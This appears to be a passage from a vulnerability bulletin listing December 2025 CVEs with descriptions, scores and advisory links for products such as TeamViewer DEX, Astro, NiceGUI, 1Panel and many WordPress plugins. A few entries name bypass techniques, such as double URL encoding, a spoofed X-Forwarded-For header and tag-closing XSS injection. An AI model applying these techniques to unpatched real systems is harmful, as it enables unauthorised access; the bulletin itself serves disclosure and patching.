| Enalean--tuleap | Tuleap is an Open Source Suite for management of software development and collaboration. Versions below 17.0.99.1762431347 of Tuleap Community Edition and Tuleap Enterprise Edition below 17.0-2, 16.13-7 and 16.12-10 allow attackers to access file release system information in projects they do not have access to. This issue is fixed in version 17.0.99.1762431347 of the Tuleap Community Edition and versions 17.0-2, 16.13-7 and 16.12-10 of Tuleap Enterprise Edition. | 2025-12-08 | 6.5 | CVE-2025-64497 | https://github.com/Enalean/tuleap/security/advisories/GHSA-v6vm-6rxf-7p2v https://github.com/Enalean/tuleap/commit/403eb69f4cfafe52254c8f9bdbe66e1fedadc254 https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=403eb69f4cfafe52254c8f9bdbe66e1fedadc254 https://tuleap.net/plugins/tracker/?aid=45583 |
| IBM--Storage Defender - Resiliency Service | IBM Storage Defender - Resiliency Service 2.0.0 through 2.0.18 could disclose sensitive user credentials in log files. | 2025-12-08 | 6.5 | CVE-2025-64650 | https://www.ibm.com/support/pages/node/7253864 |
| Microsoft--Windows Server 2022 | Exposure of sensitive information to an unauthorized actor in Microsoft Graphics Component allows an authorized attacker to disclose information over a network. | 2025-12-09 | 6.5 | CVE-2025-64670 | Windows DirectX Information Disclosure Vulnerability |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Explorer-TachyonCore-LogoffUser instruction prior V21.1. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 6.8 | CVE-2025-64990 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-PatchInsights-Deploy instruction prior V15. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 6.8 | CVE-2025-64991 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Nomad-PauseNomadJobQueue instruction prior V25. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 6.8 | CVE-2025-64992 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-ConfigMgrConsoleExtensions instructions. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 6.8 | CVE-2025-64993 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A privilege escalation vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Nomad-SetWorkRate instruction prior V17.1. The improper handling of executable search paths could allow local attackers with write access to a PATH directory on a device to escalate privileges and execute arbitrary code as SYSTEM. | 2025-12-11 | 6.5 | CVE-2025-64994 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A privilege escalation vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Exchange-NomadClientHealth-ConfigureGeneralSetting instruction prior V3.4. Improper protection of the execution path on the local device allows attackers, with local access to the device during execution, to hijack the process and execute arbitrary code with SYSTEM privileges. | 2025-12-11 | 6.5 | CVE-2025-64995 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| withastro--astro | Astro is a web framework. Versions 5.15.7 and below have a double URL encoding bypass which allows any unauthenticated attacker to bypass path-based authentication checks in Astro middleware, granting unauthorized access to protected routes. While the original CVE-2025-64765 was fixed in v5.15.8, the fix is insufficient as it only decodes once. By using double-encoded URLs, attackers can still bypass authentication and access any route protected by middleware pathname checks. This issue is fixed in version 5.15.8. | 2025-12-08 | 6.5 | CVE-2025-66202 | https://github.com/withastro/astro/security/advisories/GHSA-whqg-ppgf-wp8c https://github.com/withastro/astro/security/advisories/GHSA-ggxq-hp9w-j794 https://github.com/withastro/astro/commit/6f800813516b07bbe12c666a92937525fddb58ce |
| Huawei--HarmonyOS | Permission control vulnerability in the package management module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-12-08 | 6.2 | CVE-2025-66325 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Race condition vulnerability in the audio module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 6.7 | CVE-2025-66326 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. Versions 3.3.1 and below are vulnerable to Reflected XSS through its ui.add_css, ui.add_scss, and ui.add_sass functions. The functions lack proper sanitization or encoding for the JavaScript context they generate. An attacker can break out of the intended <style> or <script> tags by injecting closing tags (e.g., </style> or </script>), allowing for the execution of arbitrary JavaScript. This issue is fixed in version 3.4.0. | 2025-12-08 | 6.1 | CVE-2025-66469 | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-72qc-wxch-74mg https://github.com/zauberzeug/nicegui/commit/a8fd25b7d5e23afb1952d0f60a1940e18b5f1ca8 |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. Versions 3.3.1 and below are subject to a XSS vulnerability through the ui.interactive_image component of NiceGUI. The component renders SVG content using Vue's v-html directive without any sanitization. This allows attackers to inject malicious HTML or JavaScript via the SVG <foreignObject> tag whenever the image component is rendered or updated. This is particularly dangerous for dashboards or multi-user applications displaying user-generated content or annotations. This issue is fixed in version 3.4.0. | 2025-12-09 | 6.1 | CVE-2025-66470 | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-2m4f-cg75-76w2 https://github.com/zauberzeug/nicegui/commit/58ad0b36e19922de16bbc79ea3ddd29851b1a3e3 |
| 1Panel-dev--1Panel | 1Panel is an open-source, web-based control panel for Linux server management. Versions 2.0.14 and below use Gin's default configuration which trusts all IP addresses as proxies (TrustedProxies = 0.0.0.0/0), allowing any client to spoof the X-Forwarded-For header. Since all IP-based access controls (AllowIPs, API whitelists, localhost-only checks) rely on ClientIP(), attackers can bypass these protections by simply sending X-Forwarded-For: 127.0.0.1 or any whitelisted IP. This renders all IP-based security controls ineffective. This issue is fixed in version 2.0.14. | 2025-12-09 | 6.5 | CVE-2025-66508 | https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-7cqv-qcq2-r765 https://github.com/1Panel-dev/1Panel/commit/94f7d78cc9768ee244da33e09408017d1f68b5ed |
| robrichards--xmlseclibs | xmlseclibs is a library written in PHP for working with XML Encryption and Signatures. Versions 3.1.3 contain an authentication bypass vulnerability due to a flaw in the libxml2 canonicalization process during document transformation. When libxml2's canonicalization is invoked on an invalid XML input, it may return an empty string rather than a canonicalized node. xmlseclibs then proceeds to compute the DigestValue over this empty string, treating it as if canonicalization succeeded. This issue is fixed in version 3.1.4. Workarounds include treating canonicalization failures (exceptions or nil/empty outputs) as fatal and aborting validation, and/or adding explicit checks to reject when canonicalize returns nil/empty or raises errors. | 2025-12-09 | 6 | CVE-2025-66578 | https://github.com/robrichards/xmlseclibs/security/advisories/GHSA-c4cc-x928-vjw9 https://github.com/robrichards/xmlseclibs/commit/69fd63080bc47a8d51bc101c30b7cb756862d1d6 https://github.com/robrichards/xmlseclibs/blob/f4131320c6dcd460f1b0c67f16f8bf24ce4b5c3e/src/XMLSecurityDSig.php#L296 |
| containernetworking--plugins | The CNI portmap plugin allows containers to emulate opening a host port, forwarding that traffic to the container. Versions 1.6.0 through 1.8.0 inadvertently forward all traffic with the same destination port as the host port when the portmap plugin is configured with the nftables backend, thus ignoring the destination IP. This includes traffic not intended for the node itself, i.e. traffic to containers hosted on the node. Containers that request HostPort forwarding can intercept all traffic destined for that port. This requires that the portmap plugin be explicitly configured to use the nftables backend. This issue is fixed in version 1.9.0. To workaround, configure the portmap plugin to use the iptables backend. It does not have this vulnerability. | 2025-12-09 | 6.6 | CVE-2025-67499 | https://github.com/containernetworking/plugins/security/advisories/GHSA-jv3w-x3r3-g6rm https://github.com/containernetworking/plugins/pull/1210 https://github.com/containernetworking/plugins/releases/tag/v1.9.0 |
| Mayuri-Chan--pyrofork | Pyrofork is a modern, asynchronous MTProto API framework. Versions 2.3.68 and earlier do not properly sanitize filenames received from Telegram messages in the download_media method before using them in file path construction. When downloading media, if the user does not specify a custom filename (which is the common/default usage), the method falls back to using the file_name attribute from the media object. The attribute originates from Telegram's DocumentAttributeFilename and is controlled by the message sender. This issue is fixed in version 2.3.69. | 2025-12-11 | 6.5 | CVE-2025-67720 | https://github.com/Mayuri-Chan/pyrofork/security/advisories/GHSA-6h2f-wjhf-4wjx https://github.com/Mayuri-Chan/pyrofork/commit/2f2d515575cc9c360bd74340a61a1d2b1e1f1f95 |
| Exim--Exim | Exim before 4.99.1 allows remote heap corruption that will be further described on 2025-12-18. | 2025-12-14 | 6.4 | CVE-2025-67896 | https://www.openwall.com/lists/oss-security/2025/12/11/2 https://exim.org/static/doc/security/ |
| sparklewpthemes--Kingcabs | The Kingcabs theme for WordPress is vulnerable to Stored Cross-Site Scripting via the 'progressbarLayout' parameter in all versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-7058 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7d75851d-4dd5-4fb4-97bc-fc63575e483e?source=cve https://themes.trac.wordpress.org/browser/kingcabs/1.1.9/blocks-extends/blocks/progressbar.php#L44 https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=290354%40kingcabs&new=290354%40kingcabs&sfp_email=&sfph_mail= |
| kingaddons--King Addons for Elementor 4,000+ ready Elementor sections, 650+ templates, 70+ FREE widgets for Elementor | The King Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Slider, Pricing Calculator, and Image Accordion widgets in all versions up to, and including, 51.1.39 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-7960 | https://www.wordfence.com/threat-intel/vulnerabilities/id/57865837-470e-4afd-bb90-d203a78a210b?source=cve https://wordpress.org/plugins/king-addons/#developers |
| N/A--Vuetify | Improper neutralization of the title date in the 'VDatePicker' component in Vuetify, allows unsanitized HTML to be inserted into the page. This can lead to a Cross-Site Scripting (XSS) https://owasp.org/www-community/attacks/xss attack. The vulnerability occurs because the 'title-date-format' property of the 'VDatePicker' can accept a user created function and assign its output to the 'innerHTML' property of the title element without sanitization. This issue affects Vuetify versions greater than or equal to 2.0.0 and less than 3.0.0. Note: Version 2.x of Vuetify is End-of-Life and will not receive any updates to address this issue. For more information see here https://v2.vuetifyjs.com/en/about/eol/ . | 2025-12-12 | 6.3 | CVE-2025-8082 | https://www.herodevs.com/vulnerability-directory/cve-2025-8082 https://codepen.io/herodevs/pen/dPYGPyR/775285c0fd5a08038d4c85398815d644 |
| jetmonsters--JetWidgets For Elementor | The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Comparison and Subscribe widgets in all versions up to, and including, 1.0.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-8195 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9d8a03f7-a028-401c-9088-77e75dd365f6?source=cve https://plugins.trac.wordpress.org/browser/jetwidgets-for-elementor/tags/1.0.20/includes/addons/jet-widgets-subscribe-form.php https://plugins.trac.wordpress.org/browser/jetwidgets-for-elementor/tags/1.0.20/includes/addons/jet-widgets-image-comparison.php https://wordpress.org/plugins/jetwidgets-for-elementor/#developers https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3364453%40jetwidgets-for-elementor&new=3364453%40jetwidgets-for-elementor&sfp_email=&sfph_mail= |
| debuggersstudio--Marquee Addons for Elementor Advanced Elements & Modern Motion Widgets | The MarqueeAddons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Testimonial Marquee widget in all versions up to, and including, 2.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-8199 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ab664bc5-ef3c-4e5a-99d5-e3f1bb240a70?source=cve https://wordpress.org/plugins/marquee-addons-for-elementor/#developers https://plugins.trac.wordpress.org/changeset/3349636 |
| yithemes--YITH WooCommerce Quick View | The YITH WooCommerce Quick View plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's yith_quick_view shortcode in all versions up to, and including, 2.7.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-8617 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8d44dcef-6330-4ef6-8385-923e88db669f?source=cve https://plugins.trac.wordpress.org/browser/yith-woocommerce-quick-view/trunk/includes/class.yith-wcqv-frontend.php#L216 https://wordpress.org/plugins/yith-woocommerce-quick-view https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3353775%40yith-woocommerce-quick-view&new=3353775%40yith-woocommerce-quick-view&sfp_email=&sfph_mail= |
| themelooks--Enter Addons Ultimate Template Builder for Elementor | The Enter Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown and Image Comparison widgets in all versions up to, and including, 2.2.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-8687 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bcd6c085-9fd8-43d9-b244-ab91146f610f?source=cve https://wordpress.org/plugins/enteraddons/#developers https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3383539%40enteraddons&new=3383539%40enteraddons&sfp_email=&sfph_mail= |
| shamsbd71--All-in-One Addons for Elementor WidgetKit | The All-in-One Addons for Elementor - WidgetKit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Team and Countdown widgets in all versions up to, and including, 2.5.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-8779 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dbbdf433-8589-4f5f-b73d-2dba58f684a7?source=cve https://wordpress.org/plugins/widgetkit-for-elementor/#developers https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3378162%40widgetkit-for-elementor&new=3378162%40widgetkit-for-elementor&sfp_email=&sfph_mail= |
| livemesh--Livemesh SiteOrigin Widgets | The Livemesh SiteOrigin Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Hero Header and Pricing Table widgets in all versions up to, and including, 3.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-8780 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eae0783a-a409-4947-b837-aee219b4d445?source=cve https://wordpress.org/plugins/livemesh-siteorigin-widgets/#developers https://plugins.trac.wordpress.org/changeset/3390558/livemesh-siteorigin-widgets/trunk/includes/widgets/lsow-hero-image-widget/tpl/default.php https://plugins.trac.wordpress.org/changeset/3390558/livemesh-siteorigin-widgets/trunk/includes/widgets/lsow-pricing-table-widget/tpl/default.php |
| trustindex--Widgets for Google Reviews | The Widgets for Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `trustindex` shortcode in all versions up to, and including, 13.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-11 | 6.4 | CVE-2025-9436 | https://www.wordfence.com/threat-intel/vulnerabilities/id/94974552-1c52-417b-9b4e-c30fd13a8ad4?source=cve https://plugins.trac.wordpress.org/browser/wp-reviews-plugin-for-google/tags/13.0/trustindex-plugin.class.php#L803 |
| davidanderson--Redux Framework | The Redux Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data' parameter in all versions up to, and including, 4.5.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-9488 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cabf776d-8749-45a8-94c1-7d1eef93a183?source=cve https://plugins.trac.wordpress.org/browser/redux-framework/tags/4.5.7/redux-core/inc/extensions/shortcodes/class-redux-shortcodes.php#L205 https://wordpress.org/plugins/redux-framework/#developers https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3402803%40redux-framework&new=3402803%40redux-framework&sfp_email=&sfph_mail=#file22 |
| popupbuilder--Popup Builder Create highly converting, mobile friendly marketing popups. | The Popup Builder - Create highly converting, mobile friendly marketing popups. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sg_popup' shortcode in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-9856 | https://www.wordfence.com/threat-intel/vulnerabilities/id/beb6b26a-3fe1-44e0-9fda-97b288abf735?source=cve https://plugins.trac.wordpress.org/browser/popup-builder/tags/4.4.0/com/helpers/AdminHelper.php#L438 https://plugins.trac.wordpress.org/browser/popup-builder/tags/4.4.0/com/classes/popups/SGPopup.php#L1368 https://plugins.trac.wordpress.org/changeset/3384281 |
| a3rev--a3 Lazy Load | The a3 Lazy Load plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-9873 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0d837229-52fa-42ae-b733-8fbeb444f110?source=cve https://plugins.trac.wordpress.org/browser/a3-lazy-load/trunk/classes/class-a3-lazy-load.php#L430 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3377146%40a3-lazy-load&new=3377146%40a3-lazy-load&sfp_email=&sfph_mail= |
| Essential Plugin--Slider a SlidersPack | Missing Authorization vulnerability in Essential Plugin Slider a SlidersPack allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Slider a SlidersPack: from n/a before 2.3. | 2025-12-09 | 5.3 | CVE-2022-46845 | https://vdp.patchstack.com/database/wordpress/plugin/sliderspack-all-in-one-image-sliders/vulnerability/wordpress-slider-a-sliderspack-image-slider-post-slider-acf-gallery-slider-plugin-2-0-2-broken-access-control?_s_id=cve |
| Brainstorm Force--Spectra | Missing Authorization vulnerability in Brainstorm Force Spectra allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Spectra: from n/a through 2.3.0. | 2025-12-09 | 5.4 | CVE-2023-23729 | https://vdp.patchstack.com/database/wordpress/plugin/ultimate-addons-for-gutenberg/vulnerability/wordpress-spectra-wordpress-gutenberg-blocks-plugin-2-3-0-contributor-recaptcha-settings-change-vulnerability?_s_id=cve |
| Fortinet--FortiPortal | A key management errors vulnerability in Fortinet FortiAnalyzer 7.4.0 through 7.4.2, FortiAnalyzer 7.2.0 through 7.2.5, FortiAnalyzer 7.0 all versions, FortiAnalyzer 6.4 all versions, FortiManager 7.4.0 through 7.4.2, FortiManager 7.2.0 through 7.2.5, FortiManager 7.0 all versions, FortiManager 6.4 all versions, FortiOS 7.6.0, FortiOS 7.4.4, FortiOS 7.2.7, FortiOS 7.0.14, FortiPortal 6.0 all versions may allow an authenticated admin to retrieve a certificate's private key via the device's admin shell. | 2025-12-11 | 5.9 | CVE-2024-40593 | https://fortiguard.fortinet.com/psirt/FG-IR-24-133 |
| HCL Software--Workload Scheduler | HCL Workload Scheduler stores user credentials in plain text which can be read by a local user. | 2025-12-11 | 5.5 | CVE-2024-42197 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127448 |
| wssoffice21--Filter & Grids | The Filter & Grids plugin for WordPress is vulnerable to SQL Injection via the 'phrase' parameter in all versions up to, and including, 3.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This only works on MariaDB as the query results in a syntax error on MySQL. | 2025-12-13 | 5.9 | CVE-2025-10289 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f8bbab6e-ed2f-4b90-a658-aae85906d06e?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3378420%40ymc-smart-filter&new=3378420%40ymc-smart-filter&sfp_email=&sfph_mail= |
| TalentSoft Software--e-BAP Automation | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in TalentSoft Software e-BAP Automation allows Cross-Site Scripting (XSS). This issue affects e-BAP Automation: from 1.8.96 before v.41815. | 2025-12-09 | 5.3 | CVE-2025-10876 | https://www.usom.gov.tr/bildirim/tr-25-0434 |
| themeisle--RSS Aggregator by Feedzy Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator | The RSS Aggregator by Feedzy - Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 5.1.1 via the feedzy_lazy_load function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2025-12-11 | 5.8 | CVE-2025-11467 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5754dce7-6b47-4490-a04a-7eabfded0720?source=cve https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/5.1.0/includes/abstract/feedzy-rss-feeds-admin-abstract.php#L551 |
| webfactory--Login Lockdown & Protection | The Login Lockdown & Protection plugin for WordPress is vulnerable to IP Block Bypass in all versions up to, and including, 2.14. This is due to $unblock_key key being insufficiently random allowing unauthenticated users, with access to an administrative user email, to generate valid unblock keys for their IP Address. This makes it possible for unauthenticated attackers to bypass blocks due to invalid login attempts. | 2025-12-13 | 5.3 | CVE-2025-11707 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9c732ea2-0263-4b18-9aa4-29e387b26362?source=cve https://plugins.trac.wordpress.org/browser/login-lockdown/trunk/libs/functions.php https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3389843%40login-lockdown&new=3389843%40login-lockdown&sfp_email=&sfph_mail= |
| icegram--Email Subscribers & Newsletters Powerful Email Marketing, Post Notification & Newsletter Plugin for WordPress & WooCommerce | The Icegram Express - Email Subscribers, Newsletters and Marketing Automation Plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 5.9.10. This is due to the plugin not properly verifying that a user is authorized to perform an action in the `run_action_scheduler_task` function. This makes it possible for unauthenticated attackers to execute scheduled actions early or repeatedly by guessing action IDs, potentially triggering email sends, maintenance tasks, or other privileged operations, causing unexpected state changes and resource usage. | 2025-12-12 | 5.3 | CVE-2025-12348 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c6ba7244-0ecf-412f-9b8b-6b81fa6cdeb5?source=cve https://plugins.trac.wordpress.org/browser/email-subscribers/tags/5.9.4/lite/includes/classes/class-es-queue.php#L50 https://plugins.trac.wordpress.org/browser/email-subscribers/tags/5.9.4/lite/includes/classes/class-ig-es-background-process-helper.php#L194 https://plugins.trac.wordpress.org/changeset/3394838/email-subscribers/trunk/lite/includes/classes/class-ig-es-background-process-helper.php |
| saadiqbal--myCred Points Management System For Gamification, Ranks, Badges, and Loyalty Program. | The myCred - Points Management System For Gamification, Ranks, Badges, and Loyalty Program plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.9.7. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to approve withdrawal requests, modify user point balances, and manipulate the payment processing system via the cashcred_pay_now AJAX action. | 2025-12-13 | 5.3 | CVE-2025-12362 | https://www.wordfence.com/threat-intel/vulnerabilities/id/af54654b-60af-446d-b170-ee0a1ebed22c?source=cve https://plugins.trac.wordpress.org/browser/mycred/tags/2.9.5.1/addons/cash-creds/modules/cashcred-module-core.php#L141 https://plugins.trac.wordpress.org/changeset/3417299/mycred/trunk?contextall=1&old=3410754&old_path=%2Fmycred%2Ftrunk#file0 |
| netweblogic--Events Manager Calendar, Bookings, Tickets, and more! | The Events Manager - Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 7.2.2.2 via the 'get_location' action due to insufficient restrictions on which locations can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft event locations that they should not have access to. | 2025-12-12 | 5.3 | CVE-2025-12408 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8470b7be-6fae-4941-b523-93e230366522?source=cve https://plugins.trac.wordpress.org/changeset/3392395/events-manager/trunk/em-actions.php |
| IBM--WebSphere Application Server | IBM WebSphere Application Server 8.5, 9.0 and IBM WebSphere Application Server Liberty 17.0.0.3 through 25.0.0.12 are affected by cross-site scripting due to improper validation of user-supplied input. An attacker could exploit this vulnerability by using a specially crafted URL to redirect the user to a malicious site. | 2025-12-08 | 5.4 | CVE-2025-12635 | https://www.ibm.com/support/pages/node/7254078 |
| hippooo--Hippoo Mobile App for WooCommerce | The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to arbitrary file write via a missing authorization check in all versions up to, and including, 1.7.1. This is due to the REST API endpoint `/wp-json/hippoo/v1/wc/token/save_callback/{token_id}` being registered with `permission_callback => '__return_true'`, which allows unauthenticated access. This makes it possible for unauthenticated attackers to write arbitrary JSON content to the server's publicly accessible upload directory via the vulnerable endpoint. | 2025-12-12 | 5.3 | CVE-2025-12655 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d34701a0-c745-441c-8d6c-7befc877f8d0?source=cve https://plugins.trac.wordpress.org/browser/hippoo/tags/1.6.1/app/web_api.php#L45 https://plugins.trac.wordpress.org/browser/hippoo/tags/1.6.1/app/web_api.php#L117 https://plugins.trac.wordpress.org/browser/hippoo/tags/1.6.1/app/utils.php#L1 |
| campay--Campay Woocommerce Payment Gateway | The Campay Woocommerce Payment Gateway plugin for WordPress is vulnerable to Unauthenticated Payment Bypass in all versions up to, and including, 1.2.2. This is due to the plugin not properly validating that a transaction has occurred through the payment gateway. This makes it possible for unauthenticated attackers to bypass payments and mark orders as successfully completed resulting in a loss of income. | 2025-12-12 | 5.3 | CVE-2025-12883 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2f12fa00-6108-4bd4-9310-8558211f4d0f?source=cve https://wordpress.org/plugins/campay-api/ |
| ajitdas--Devs CRM Manage tasks, attendance and teams all together | The Devs CRM - Manage tasks, attendance and teams all together plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the /wp-json/devs-crm/v1/attendances REST API Endpoint in all versions up to, and including, 1.1.8. This makes it possible for unauthenticated attackers to retrieve private user data, including password hashes. | 2025-12-13 | 5.3 | CVE-2025-13092 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c67c520d-4843-4ef1-8c96-cbf0eaab58cb?source=cve https://wordpress.org/plugins/devs-crm/ |
| ajitdas--Devs CRM Manage tasks, attendance and teams all together | The Devs CRM - Manage tasks, attendance and teams all together plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the '/wp-json/devs-crm/v1/bulk-update' REST-API endpoint in all versions up to, and including, 1.1.8. This makes it possible for unauthenticated attackers to update leads tags. | 2025-12-13 | 5.3 | CVE-2025-13093 | https://www.wordfence.com/threat-intel/vulnerabilities/id/78794ea4-6eff-4e6f-af0a-dd8cab8ac859?source=cve https://wordpress.org/plugins/devs-crm/ |
| IBM--Aspera Orchestrator | IBM Aspera Orchestrator 4.0.0 through 4.1.0 could allow an authenticated user to cause a denial of service in the email service due to improper control of interaction frequency. | 2025-12-11 | 5.3 | CVE-2025-13211 | https://www.ibm.com/support/pages/node/7254434 |
| Kubernetes--Kubernetes | A half-blind Server Side Request Forgery (SSRF) vulnerability exists in kube-controller-manager when using the in-tree Portworx StorageClass. This vulnerability allows authorized users to leak arbitrary information from unprotected endpoints in the control plane's host network (including link-local or loopback services). | 2025-12-14 | 5.8 | CVE-2025-13281 | https://github.com/kubernetes/kubernetes/issues/135525 https://groups.google.com/g/kubernetes-security-announce/c/EORqZg0k1l4/m/TtD-q0v7AgAJ |
